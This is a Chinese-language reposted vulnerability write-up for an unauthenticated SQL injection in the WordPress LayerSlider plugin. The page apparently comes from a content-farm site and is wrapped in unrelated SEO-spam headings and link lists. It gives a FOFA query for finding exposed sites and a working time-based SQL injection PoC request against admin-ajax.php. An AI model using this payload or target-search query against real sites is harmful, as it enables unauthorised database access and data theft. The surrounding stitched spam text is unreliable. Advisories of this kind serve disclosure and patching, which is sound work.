当前位置: 首页 > news >正文

自己做的网站在浏览器上显示不安全吗电商网址

自己做的网站在浏览器上显示不安全吗,电商网址,做网站资料准备,在网站建设流程中编程属于()阶段0x01 产品简介 WordPress插件LayerSlider是一款可视化网页内容编辑器、图形设计软件和数字视觉效果应用程序,全球活跃安装量超过 1,000,000 次。 0x02 漏洞概述 WordPress LayerSlider插件版本7.9.11 – 7.10.0中,由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),…

0x01 产品简介

WordPress插件LayerSlider是一款可视化网页内容编辑器、图形设计软件和数字视觉效果应用程序,全球活跃安装量超过 1,000,000 次。

0x02 漏洞概述

WordPress LayerSlider插件版本7.9.11 – 7.10.0中,由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),可能导致通过 ls_get_popup_markup 操作受到SQL注入攻击,未经身份验证的威胁者可利用该漏洞从数据库中获取敏感信息。

0x03 影响范围

LayerSlider插件版本7.9.11 – 7.10.0

0x04 复现环境

FOFA:body="/wp-content/plugins/LayerSlider/"

0x05 漏洞复现

PoC

GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.
http://www.zhongyajixie.com/news/38444.html

相关文章:

  • 宣传推广方案怎么写模板seo主要做什么
  • 智能广告投放平台东莞seo报价
  • 哪个网站可以做批发关键词优化策略
  • 没有网站如何做cpa百度权重是怎么来的
  • wordpress 菜单首页百度推广优化工具
  • 淘宝店铺 发布网站建设自动的网站设计制作
  • 外贸快车官网seo流量工具
  • 动漫网站开发毕业设计做公司网站的公司
  • 萍乡网站制作爱站工具查询
  • WordPress自定义密码的插件最专业的seo公司
  • 移动版网站怎么做徐州seo培训
  • 网站建设gon引流推广多少钱一个
  • 钓鱼网站排名假冒建设银行最多网赌怎么推广拉客户
  • 怎么查询网站点击量培训方案
  • WordPress编辑文章空白广州seo推广
  • 傻瓜网页制作工具seo软件开发
  • 展示型网站怎么做市场营销实际案例
  • 电脑怎做单页网站百度搜索引擎营销
  • 网站建设市场分析如何做营销
  • 深圳做网站的爱情独白爱上链外链购买平台
  • 邢台做移动网站公司免费seo工具大全
  • 淘宝网店设计制作网站seo诊断工具
  • 温州市城乡建设信息港郑州网站优化公司
  • 武汉设计公司推荐网站推广优化招聘
  • 企业网站栏目设置说明关键词营销优化
  • 公司网站建设的步骤厦门seo排名扣费
  • 南京公司网站建设网站策划方案
  • 怎么在Front做网站做百度推广的业务员电话
  • 网站加载进度条新乡seo外包
  • 国外一家做乳胶衣视频的网站cnzz数据统计